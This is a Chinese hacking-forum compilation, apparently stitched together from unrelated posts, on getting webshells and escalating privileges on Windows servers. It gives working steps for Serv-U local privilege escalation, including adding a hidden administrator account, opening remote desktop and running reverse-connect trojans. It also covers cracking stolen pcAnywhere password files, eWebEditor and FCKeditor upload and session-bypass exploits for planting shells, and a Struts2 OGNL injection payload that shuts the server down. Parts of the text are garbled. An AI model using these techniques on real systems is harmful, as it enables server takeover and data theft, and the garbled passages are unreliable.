测试最新的struts2漏洞 以及怎么拿到shell

到webshell后提权的三种方法，当然还有其它的方法在以后的时间呈现给大家，祝大家国庆愉快。好好把握时间。webshell提权是一门学问。它涉及到不只是一些软件，一些方法。最重要的是思路。今天就是来学习webshell的提权的两种特别常见的方法。以及一些提权思路在学习之前呢。推荐大家看一下这个文章。] http://bbshackbasecom/viewthreadphptid=2686993&fpage=1 虽然有些办法而今已经不适用了。但是有的办法还依然可以提升权限。。下图为察看本地察看权限的方法：新仔是当前用户zxpc为计算机名，大家可以看他的权限我们再提权之前。要知道什么是提权。为什么要提权。提权的原因是，我们拿到一个服务器的webshell以后。如果想进而扩大战果。拿下整个服务器。开这个服务器的3389，。远程桌面登陆。仅仅靠一个webshell是不可能作到的。因为webshell的权限是GUEST。很低的权限。而我们想在服务器上运行我们的木马后门。必须要在administrator权限以上。所以我们就要把我们的权限提升成为administrator权限。知道原理以后，我们就来看一看提权基本上有哪些方法1。首先是利用serv-u提权。serv-u是一款出色的FTP工具。很多企业。服务器都使用它作为本地传输文件的媒介。默认来说。serv-u是以系统权限执行的。所以会每次开机都自动以系统权限启动。。安装。，使用过serv-u的朋友们估计都知道。serv-u 有一个本地的帐户。也就是本地管理serv-u服务器的admin。我们就可以利用这个admin帐户。来执行我们需要的命令。这就是serv-u本地提权的来路。假设我们已经拿到了一个站的webshell。我们来看一下这个站的设置。以及构造。从结构上来看。cmdexe不能直接被执行。net user一些基本的命令也不能直接在webshell里运行。图1输入命令图2运行错误图3 cmd执行成功但是有写权限。，所以我们就需要找到一个可以运行文件的目录。传一个cmdexe 和一个serv-u的本地提权工具过去。工具已经打包。大家可以到我们的主页去下载。 wwwhackbasecom 好了。，我们首先要找可以执行文件的目录。什么是能执行文件的目录呢？如图1。当本地IISUSER可执行。或者everyone可执行。的时候，该目录就为能执行文件的目录。当然，我们在webshell里是看不到这些的。所以我们就要逐一尝试。一般来说。网站跟目录里面的任何目录都具有可写，可执行的权限。我们现在就来看看如何在这种情况下。提权成功。。利用工具。3389exe ftpexe cmdexe 修改版本图4 这是上传到webshell中的工具我们假设找到了可执行文件的目录。d:\1 我们把我们的3个工具都放上去。我们在海洋木马的，执行如下命令。d:\1\ftpexe "里面为我们任意希望执行的DOS命令"比如我们希望加一个用户在里面。我们就执行。d:\1\ftpexe “net user 123 /add”这样就建立了一个名字为123密码是空的用户了。继续执行 d:\1\ftpexe “net localgroup administrators 123 /add”就把它提升到了管理员组图5传说中的管理员组然后我们需要开3389。在这里我推荐给大家一款能开XP 2000SERVER 和2003三种系统的3389exe图6 3389exe的使用，就是在webshell中输入图中的命令非常方便。而且开XP 和03系统不用重起。本身才17K大小。可以再加个别的壳。好了。我们到d:\1\ftpexe “d:\1\3389exe”这样就提权了。。如图7 我们还可以利用这个FTP本地提权执行我们的反弹木马。这样一来。就算对方是内网。，也乖乖的上线了。。第2种方法。PCANYWHERE提权。 图8pcanywhere是一款非常优秀的远程控制软件。它可以修改任意连接端口。设置访问权限。所以很多网站的管理员都舍弃了3389。而使用它。但是。它的密码文件都保存在了C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\目录下。我们直接在webshell里面如果能跳转到这个目录。就可以拿到它的cif文件。下载回本地以后。用专门破它密码的工具一跑。。马上就出来了。。然后呢。就是本地安装一个pcanywhere来连接对方。如果对方有IP限制。或者做了连接防范，我们就只好端口映射了。。具体方法。进参阅 http://bbshackbasecom/viewthreadphptid=2715744&fpage=1 里的“新手入门第8课”好了。第3种方法。就是利用系统漏洞进行溢出。在这里我向大家推荐一篇MS05039漏洞提权的文章 http://bbshackbasecom/viewthreadphptid=2772128&fpage=1

eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件（如：Word）所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框，使最终用户可以可视化的发布HTML格式的网页内容。 eWebEditor!已基本成为网站内容管理发布的必备工具！如果有兴趣的话去官方了解详情： http://wwwewebeditornet/先说重点吧，这个编辑器按脚本分主要有3个版本，ASP/ASPX/PHP/ 每个版本都可以利用的先说下FCKeditor的:/admin/FCKeditor/editor/filemanager/browser/default/browserhtmltype=image&connector=connectors/asp/connectorasp可建目录。ASP版:这个版本其实个人感觉是影响最大，使用最多的一个了吧，早期很多asp站都用这个，当然现在也是大量的存在的。。。怎么利用呢？一般用这个的默认后台的URL都是默认的：wwwxxxcom/admin/ewebeditor/admin_loginasp而且账户和密码也基本都是默认的：admin admin对于找这个路径还有个简单的方法，就是在他站上新闻或者其他板块上找，看的URL也是可以找到的，不明白的自己试下就知道了还有如果默认的账户和密码修改了，我们可以下载他的数据库，然后本地破解MD5了默认数据库：/db/ewebeditormdb 或者 /db/ewebeditorasp一般下载数据库后打开察看就可以了，然后后台登陆，新加样式。。。上传ASA马。。。有的站数据库设置了只读属性，这样的站你是无法新加样式的，这样的站你可以看他数据库里的样式设置情况，一般很多时候都是让人给拿过的，而且明显的asa在那里。。。呵呵，这样的话就可以直接构造一个调用这个样式的连接来上传shell比如发现数据库里有样式 123 他设置的是可以上传asa的话那么就可以这样调用： http://wwwxxxcom/eWeb/eWebEditoraspid=contentCN&style=123这样就可以直接上传了，然后在点“编辑”就会找到shell的路径了其实这个漏洞主要是uploadasp的过滤不严造成的，新版的应该都修复了，具体受影响的版本我也没统计过另外在公布另外一个ewebeditor的漏洞漏洞文件:Admin_Privateasp漏洞语句:<%If Session("eWebEditor_User") = "" ThenResponseRedirect "admin_loginasp"ResponseEndEnd If只判断了session，没有判断cookies和路径的验证问题。漏洞利用:新建一个mrchenasp内容如下:<%Session("eWebEditor_User") = "11111111"%>访问mrchenasp，再访问后台任何文件，for example:Admin_Defaultasp这个拿shell的方法就简单了，不详细说了ASPX版：受影响文件：eWebEditorNet/uploadaspx利用方法：添好本地的cer的Shell文件。在浏揽器输入javascript:lbtnUploadclick();就能得到shell,具体大家自己尝试，不明白的联系我，或者留言/ftbimagegalleryaspxframe=1&rif=&cif=\\\\\\\ 可以浏览目录。PHP版关于eWebEditor 漏洞php版本的和asp的一样。有目录浏览。和编辑扩展名。重点在于虽然支持了php格式但上传还是上传不了。不过利用织梦的gif89a漏洞倒可以实现php一句话上传，然后再上传webshell。备注：织梦的gif89a漏洞，准确来说应该是DEDECMS中所用的php版的FCKeditor存在上传漏洞，gif89a文件头欺骗。DEDECMS中在上传拖上没有对picSubmit进行任何处理。但是却不能直接上传php马。因为会识别。

问题简单!种问题肯定Action请求路径问题或者边没配置升级版本导致Action请求仔细查看配置路径或者查查23版本请求路径特殊配置要求用纠结种问题没析试几路i经或者看看webxml文件struts2滤器filter配置版本问题升级版本配置文件struts2配置版本信息肯定要跟着换

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xworkMethodAccessordenyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20javalangBoolean("false")))&(asdf)(('\u0023rtexit(1)')(\u0023rt\u003d@javalangRuntime@getRuntime()))=1

段代码运行低版本struts2项目亲测效获取应用action段代码粘贴于action比

localhost:8080/StrutsTest/goLoginaction确实让web应用服务关闭

网查资料知OGNL引擎代码转义

('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xworkMethodAccessordenyMethodExecution']=#foo')(#foo=new%20javalangBoolean("false")))&(asdf)(('#rtexit(1)')(#rt=@javalangRuntime@getRuntime()))=1

终结 javalangRuntimegetRuntime()exit(1);

求神详解转义代码运行流程具体执行程

在计算机科学中，Shell俗称壳（用来区别于核），是指“提供使用者使用界面”的软件（命令解析器）。用途 一般情况下： 使用用户的缺省凭证和环境执行 shell。shell 命令重新初始化用户的登录会话。当给出该命令时，就会重新设置进程的控制终端的端口特征，并取消对端口的所有访问。然后 shell 命令为用户把进程凭证和环境重新设置为缺省值，并执行用户的初始程序。根据调用进程的登录用户标识建立所有的凭证和环境。

"web" - 显然需要服务器开放web服务,"shell" - 取得对服务器某种程度上操作权限。

webshell常常被称为匿名用户(入侵者)通过WEB服务端口对WEB服务器有某种程度上操作的权限,由于其大多是以网页脚本的形式出现，也有人称之为网站后门工具。

webshell有什么作用？

一方面，webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为WEB

脚本木马，目前比较流行的asp或php木马，也有基于NET的脚本木马。